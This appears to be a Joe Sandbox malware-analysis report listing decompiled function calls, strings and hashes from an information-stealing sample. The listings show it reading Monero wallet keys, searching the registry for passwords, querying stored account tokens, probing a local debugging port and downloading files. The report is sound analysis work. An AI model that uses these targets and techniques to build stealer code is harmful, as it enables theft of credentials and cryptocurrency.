Part of subcall function 005FA210: LocalAlloc.KERNEL32(00000040,?,?,?,005F4F3E,00000000,?), ref: 005FA251
Part of subcall function 005FA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O_,00000000,00000000), ref: 005FA27A
Part of subcall function 005FA210: LocalFree.KERNEL32(?,?,?,?,005F4F3E,00000000,?), ref: 005FA28F

lstrcat.KERNEL32(?,00000000), ref: 006046F3
StrCmpCA.SHLWAPI(?,006108D2), ref: 00604710
lstrcat.KERNEL32(00000000,00000000), ref: 00604722
lstrcat.KERNEL32(00000000,?), ref: 00604735
lstrcat.KERNEL32(00000000,00610FA0), ref: 00604744

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: da23bdbd95a6dd944472e54ca63ee7db448e014c1143ab5c0e8b24d1a831291d
Instruction ID: a4c1238b688e8a966e6a0861b442be670f85846bb5f2cfa007899abfae3f0940
Opcode Fuzzy Hash: da23bdbd95a6dd944472e54ca63ee7db448e014c1143ab5c0e8b24d1a831291d
Instruction Fuzzy Hash: DC7165B6940208ABDB14EBB0DD9AFEE777ABB88300F004598F60597181EB75DB48CF55

Function 005F1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 005F12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F12B4
Part of subcall function 005F12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005F12BB
Part of subcall function 005F12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005F12D7
Part of subcall function 005F12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005F12F5
Part of subcall function 005F12A0: RegCloseKey.ADVAPI32(?), ref: 005F12FF

lstrcat.KERNEL32(?,00000000), ref: 005F134F
lstrlen.KERNEL32(?), ref: 005F135C
lstrcat.KERNEL32(?,.keys), ref: 005F1377

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 00608CF0: GetSystemTime.KERNEL32(00610E1B,00F4EF50,006105B6,?,?,005F13F9,?,0000001A,00610E1B,00000000,?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 00608D16

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 005F1465

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005FA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005FA13C
Part of subcall function 005FA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005FA161
Part of subcall function 005FA110: LocalAlloc.KERNEL32(00000040,?), ref: 005FA181
Part of subcall function 005FA110: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005FA1AA
Part of subcall function 005FA110: LocalFree.KERNEL32(005F148F), ref: 005FA1E0
Part of subcall function 005FA110: CloseHandle.KERNEL32(000000FF), ref: 005FA1EA

DeleteFileA.KERNEL32(00000000), ref: 005F14EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 005F1335
wallet_path, xrefs: 005F1330
\Monero\wallet.keys, xrefs: 005F138D
.keys, xrefs: 005F136B

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 83c7f9a3dbdab20877fc0a812d02fc0be276d01c3de6e30e47effe407f14ac8e
Instruction ID: 0c724621cfc61f916320caeddb7333695c62d5be11c6daa18195fa996107cb8c
Opcode Fuzzy Hash: 83c7f9a3dbdab20877fc0a812d02fc0be276d01c3de6e30e47effe407f14ac8e
Instruction Fuzzy Hash: 3351447199021997CB58FBA0DD92EEE733DAF54340F4045DCB20A620D2EF705B88CE69

Function 005F9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00610AF6,00000001,00000000,00000000,00000000), ref: 005F9A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 005F9AAB
InternetCloseHandle.WININET(00000000), ref: 005F9AC7

Strings

http://localhost:9229/json, xrefs: 005F9A9F
"webSocketDebuggerUrl":, xrefs: 005F9B4B
"ws://, xrefs: 005F9B84

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: 67410073e7db985a803a41dfa53110ce2134e4c668bbd90c77c06ed96bcfbae8
Instruction ID: 43922a3c6671979b60fbdf614b957573d9204296ab4daaccd56a417773385bf6
Opcode Fuzzy Hash: 67410073e7db985a803a41dfa53110ce2134e4c668bbd90c77c06ed96bcfbae8
Instruction Fuzzy Hash: F4414E35A50218ABDB14EF94CC95FEE7779BB48740F144059F609AB190CBB4AEC0CF64

Function 005F7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005F7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005F739A
Part of subcall function 005F7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005F7411
Part of subcall function 005F7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005F746D
Part of subcall function 005F7330: GetProcessHeap.KERNEL32(00000000,?), ref: 005F74B2
Part of subcall function 005F7330: HeapFree.KERNEL32(00000000), ref: 005F74B9

lstrcat.KERNEL32(00000000,0061192C), ref: 005F7666
lstrcat.KERNEL32(00000000,00000000), ref: 005F76A8
lstrcat.KERNEL32(00000000, : ), ref: 005F76BA
lstrcat.KERNEL32(00000000,00000000), ref: 005F76EF
lstrcat.KERNEL32(00000000,00611934), ref: 005F7700
lstrcat.KERNEL32(00000000,00000000), ref: 005F7733
lstrcat.KERNEL32(00000000,00611938), ref: 005F774D
task.LIBCPMTD ref: 005F775B

Strings

: , xrefs: 005F76AE

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 58a632c849b69efa7bc34ffc3f27c48bc05aa84a5568cf67b29bd8b6eed02dd6
Instruction ID: 28fcb35991c08b607e235b29168c1682d3153f188f3d6cc5504105b1596474b7
Opcode Fuzzy Hash: 58a632c849b69efa7bc34ffc3f27c48bc05aa84a5568cf67b29bd8b6eed02dd6
Instruction Fuzzy Hash: 10314D7190410DDBDF04EBA0DC99DFF7B7AFB48301B104608F606A72A1DA38A946CF90

Function 00608290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F4F020,00000000,?,00610E14,00000000,?,00000000), ref: 006082C0
RtlAllocateHeap.NTDLL(00000000), ref: 006082C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006082E8
__aulldiv.LIBCMT ref: 00608302
__aulldiv.LIBCMT ref: 00608310
wsprintfA.USER32 ref: 0060833C

Strings

%d MB, xrefs: 00608333
@, xrefs: 006082DD

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 6ed760c5eac6f40d0efa994038e2d6167a76d5c735e5177e9846f451ccf94cf0
Instruction ID: e1defb51d3b3e7546efa27be744921419414a6eb5904b98ef9bca4a43d85a46c
Opcode Fuzzy Hash: 6ed760c5eac6f40d0efa994038e2d6167a76d5c735e5177e9846f451ccf94cf0
Instruction Fuzzy Hash: D121F7B1A44208ABDB04DFD4CC49FAFB7B9FB44B10F104619F615AB2C0C77859018BA5

Function 005F60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005F4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4889
Part of subcall function 005F4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4899

InternetOpenA.WININET(00610DFB,00000001,00000000,00000000,00000000), ref: 005F615F
StrCmpCA.SHLWAPI(?,00F4FD10), ref: 005F6197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005F61DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005F6203
InternetReadFile.WININET(?,?,00000400,?), ref: 005F622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005F625A
CloseHandle.KERNEL32(?,?,00000400), ref: 005F6299
InternetCloseHandle.WININET(?), ref: 005F62A3
InternetCloseHandle.WININET(00000000), ref: 005F62B0

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 14921c64564865eb7b5851e1c2a95e61f4398616a69bc4a13eb79d5b639d90ce
Instruction ID: 9551597e9f4071ab3b46c1cc5512f6b29a6af300b8c850766a78087455b1351e
Opcode Fuzzy Hash: 14921c64564865eb7b5851e1c2a95e61f4398616a69bc4a13eb79d5b639d90ce
Instruction Fuzzy Hash: A7515DB1A4020CABDB24DFA0CC45FEE7B79BB44301F108499E605A71C1DB74AA89CF99

Function 0067012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0067024D
___TypeMatch.LIBVCRUNTIME ref: 0067035B
CatchIt.LIBVCRUNTIME ref: 006703AC
CallUnexpected.LIBVCRUNTIME ref: 006704C8

Strings

csm, xrefs: 00670284
csm, xrefs: 0067016B
csm, xrefs: 006701D8

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction ID: b62163f4d34134d762c94253ea899993652f1a1b95da3fd65e4f44153884ac53
Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction Fuzzy Hash: 14B19E75800209EFEF25DFA4D8819EEB7B6FF04310F14816AE9196B316D331EA51CBA5

Function 005F7330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005F739A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005F7411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005F746D
GetProcessHeap.KERNEL32(00000000,?), ref: 005F74B2
HeapFree.KERNEL32(00000000), ref: 005F74B9
task.LIBCPMTD ref: 005F75B5

Strings

Password, xrefs: 005F7461

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 79f1324373d5904f0cc45c386ae8a219918a05f49c93486a527ce3c07e0e34b7
Instruction ID: 3232fba860e2f54259f489c6f2ebc3bcaa378f77cf5caf2a4203b7df04699cb2
Opcode Fuzzy Hash: 79f1324373d5904f0cc45c386ae8a219918a05f49c93486a527ce3c07e0e34b7
Instruction Fuzzy Hash: A761F9B590416D9BDB24DB50CC55FEABBB8BF48300F0085E9E649A6141EFB46BC9CF90

Function 005FBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

lstrlen.KERNEL32(00000000), ref: 005FBC6F

Part of subcall function 00608FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 005FBC9D
lstrlen.KERNEL32(00000000), ref: 005FBD75
lstrlen.KERNEL32(00000000), ref: 005FBD89

Strings

AccountId, xrefs: 005FBC94
AccountTokens, xrefs: 005FBB19
SELECT service, encrypted_token FROM token_service, xrefs: 005FBBBB
AccountTokens, xrefs: 005FBA8A

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
